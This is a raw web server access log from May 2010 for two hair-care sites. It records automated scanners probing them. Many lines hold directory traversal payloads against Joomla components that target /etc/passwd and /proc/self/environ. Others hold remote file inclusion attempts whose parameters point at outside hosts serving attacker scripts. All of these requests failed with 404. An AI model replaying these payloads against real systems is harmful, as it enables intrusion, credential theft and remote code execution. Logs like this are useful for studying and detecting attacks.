79.174.72.86 - - [17/May/2010:02:57:59 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)" "growlonghairfast.com"
79.174.72.86 - - [17/May/2010:02:58:00 -0700] "GET /logs/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck" "growlonghairfast.com"
79.174.72.86 - - [17/May/2010:02:58:00 -0700] "GET /logs/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "growlonghairfast.com"
216.227.218.240 - - [17/May/2010:02:58:37 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/" "growlonghairfast.com"
216.227.221.228 - - [17/May/2010:02:58:40 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "growlonghairfast.com"
79.174.72.86 - - [17/May/2010:02:58:44 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "growlonghairfast.com"
79.174.72.86 - - [17/May/2010:02:58:44 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "growlonghairfast.com"
91.214.44.233 - - [17/May/2010:02:58:55 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01" "www.freehairsecrets.com"
91.214.44.233 - - [17/May/2010:02:58:55 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01" "www.freehairsecrets.com"
216.227.218.240 - - [17/May/2010:02:59:07 -0700] "GET /logs/access_100510.log/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2" "growlonghairfast.com"
216.227.218.240 - - [17/May/2010:02:59:07 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2" "growlonghairfast.com"
216.227.218.240 - - [17/May/2010:02:59:07 -0700] "GET /logs/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/" "growlonghairfast.com"
216.227.218.240 - - [17/May/2010:03:00:28 -0700] "GET /logs/access_100412.log/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "growlonghairfast.com"
79.174.72.86 - - [17/May/2010:03:02:16 -0700] "GET /logs/access.log/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck" "www.freehairsecrets.com"
79.174.72.86 - - [17/May/2010:03:02:16 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1" "www.freehairsecrets.com"
79.174.72.86 - - [17/May/2010:03:02:16 -0700] "GET /logs/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2" "www.freehairsecrets.com"
79.174.72.86 - - [17/May/2010:03:02:17 -0700] "GET /logs/access.log/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2" "www.freehairsecrets.com"
79.174.72.86 - - [17/May/2010:03:02:17 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck" "www.freehairsecrets.com"
79.174.72.86 - - [17/May/2010:03:02:17 -0700] "GET /logs/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.freehairsecrets.com"
211.189.18.242 - - [17/May/2010:03:02:19 -0700] "GET /bbs///delete_all.php?board_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:03:03:58 -0700] "GET /bbs///delete_all.php?board_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
79.174.72.86 - - [17/May/2010:03:04:00 -0700] "GET /logs/access_100412.log/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1" "growlonghairfast.com"
79.174.72.86 - - [17/May/2010:03:04:00 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck" "growlonghairfast.com"
79.174.72.86 - - [17/May/2010:03:04:00 -0700] "GET /logs/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2" "growlonghairfast.com"
79.174.72.86 - - [17/May/2010:03:04:01 -0700] "GET /logs/access_100412.log/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck" "growlonghairfast.com"
79.174.72.86 - - [17/May/2010:03:04:01 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck" "growlonghairfast.com"
79.174.72.86 - - [17/May/2010:03:04:01 -0700] "GET /logs/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1" "growlonghairfast.com"
211.115.213.158 - - [17/May/2010:03:06:10 -0700] "GET /logs/bbs/delete_all.php?board_skin_path=http://empcl.org/bbs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.115.213.158 - - [17/May/2010:03:06:10 -0700] "GET /bbs/delete_all.php?board_skin_path=http://empcl.org/bbs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.115.213.158 - - [17/May/2010:03:06:10 -0700] "GET /logs/access.log/bbs/delete_all.php?board_skin_path=http://empcl.org/bbs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:03:06:16 -0700] "GET /logs/access_100222.log//bbs///delete_all.php?board_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:03:06:16 -0700] "GET /bbs///delete_all.php?board_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:03:06:17 -0700] "GET /logs//bbs///delete_all.php?board_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.115.213.158 - - [17/May/2010:03:06:27 -0700] "GET /bbs/delete_all.php?board_skin_path=http://empcl.org/bbs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.115.213.158 - - [17/May/2010:03:06:27 -0700] "GET /logs/bbs/delete_all.php?board_skin_path=http://empcl.org/bbs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.115.213.158 - - [17/May/2010:03:06:27 -0700] "GET /logs/access.log/bbs/delete_all.php?board_skin_path=http://empcl.org/bbs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
193.105.210.173 - - [17/May/2010:03:06:43 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6" "www.freehairsecrets.com"
193.105.210.173 - - [17/May/2010:03:06:43 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6" "www.freehairsecrets.com"
211.189.18.242 - - [17/May/2010:03:07:20 -0700] "GET /logs/access_100308.log//bbs///delete_all.php?board_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
212.117.175.33 - - [17/May/2010:03:08:06 -0700] "GET /freehairsecretsphp/viewtopic.php?p=631&sid=0bbdde56fc1c8631ab837793a5241ad3 HTTP/1.0" 200 438 "http://growlonghairfast.com/freehairsecretsphp/viewtopic.php?p=631&sid=0bbdde56fc1c8631ab837793a5241ad3" "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)" "growlonghairfast.com"
212.117.175.33 - - [17/May/2010:03:08:06 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:03:13:38 -0700] "GET /logs/access_100308.log//bbs///delete_all.php?board_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:03:13:39 -0700] "GET /bbs///delete_all.php?board_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:03:13:39 -0700] "GET /logs//bbs///delete_all.php?board_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
77.221.137.18 - - [17/May/2010:03:13:53 -0700] "GET /login.php?dir=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
77.221.137.18 - - [17/May/2010:03:13:53 -0700] "GET /logs//login.php?dir=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
114.108.151.149 - - [17/May/2010:03:14:46 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:14:58 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:15:00 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:15:00 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:03:16:04 -0700] "GET /bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:03:16:04 -0700] "GET /logs//bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:03:16:04 -0700] "GET /logs/access_100222.log//bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:03:16:14 -0700] "GET /logs/access_100301.log//bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:03:16:32 -0700] "GET /logs/access_100301.log//bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:03:16:32 -0700] "GET /bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:03:16:32 -0700] "GET /logs//bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:03:16:54 -0700] "GET /logs//bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:03:16:54 -0700] "GET /bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:03:16:54 -0700] "GET /logs/access_100222.log%20%20//bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:03:17:35 -0700] "GET /logs/access_100301.log%20%20//bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:03:18:09 -0700] "GET /bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:03:18:09 -0700] "GET /logs/access_100222.log//bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:03:18:09 -0700] "GET /logs//bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:03:18:20 -0700] "GET /logs/access_100426.log//bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:19:17 -0700] "GET /logs/access_100405.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:19:17 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:19:18 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
211.115.213.158 - - [17/May/2010:03:19:27 -0700] "GET /bbs/delete_all.php?board_skin_path=http://empcl.org/bbs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.115.213.158 - - [17/May/2010:03:19:27 -0700] "GET /logs/access.log%20%20/bbs/delete_all.php?board_skin_path=http://empcl.org/bbs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.115.213.158 - - [17/May/2010:03:19:27 -0700] "GET /logs/bbs/delete_all.php?board_skin_path=http://empcl.org/bbs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
114.108.151.149 - - [17/May/2010:03:20:15 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
211.115.213.158 - - [17/May/2010:03:20:50 -0700] "GET /bbs/delete_all.php?board_skin_path=http://empcl.org/bbs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.115.213.158 - - [17/May/2010:03:20:50 -0700] "GET /logs/bbs/delete_all.php?board_skin_path=http://empcl.org/bbs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.115.213.158 - - [17/May/2010:03:20:50 -0700] "GET /logs/access.log%20%20/bbs/delete_all.php?board_skin_path=http://empcl.org/bbs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
114.108.151.149 - - [17/May/2010:03:21:03 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:21:13 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [17/May/2010:03:22:01 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
211.115.213.158 - - [17/May/2010:03:22:04 -0700] "GET /logs/access_100510.log%20%20/bbs/delete_all.php?board_skin_path=http://empcl.org/bbs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:22:18 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:22:38 -0700] "GET /logs/access_100510.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:22:38 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:22:39 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:22:43 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:22:48 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
211.115.213.158 - - [17/May/2010:03:23:08 -0700] "GET /logs/access_100510.log%20%20/bbs/delete_all.php?board_skin_path=http://empcl.org/bbs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:23:11 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:23:49 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:03:24:15 -0700] "GET /bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:03:24:15 -0700] "GET /logs//bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:03:24:15 -0700] "GET /logs/access_100125.log%20%20//bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:03:26:00 -0700] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.43.194.3 - - [17/May/2010:03:26:00 -0700] "GET /bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.43.194.3 - - [17/May/2010:03:26:00 -0700] "GET /logs//bbs/write_update.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
114.108.151.149 - - [17/May/2010:03:26:18 -0700] "GET /logs/access_100405.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:26:19 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:26:20 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:27:10 -0700] "GET /logs/access_100419.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:27:11 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [17/May/2010:03:27:11 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.175.61.122 - - [17/May/2010:03:27:33 -0700] "GET /logs/access_100510.log/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
69.175.61.122 - - [17/May/2010:03:27:33 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
69.175.61.122 - - [17/May/2010:03:27:33 -0700] "GET /logs/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
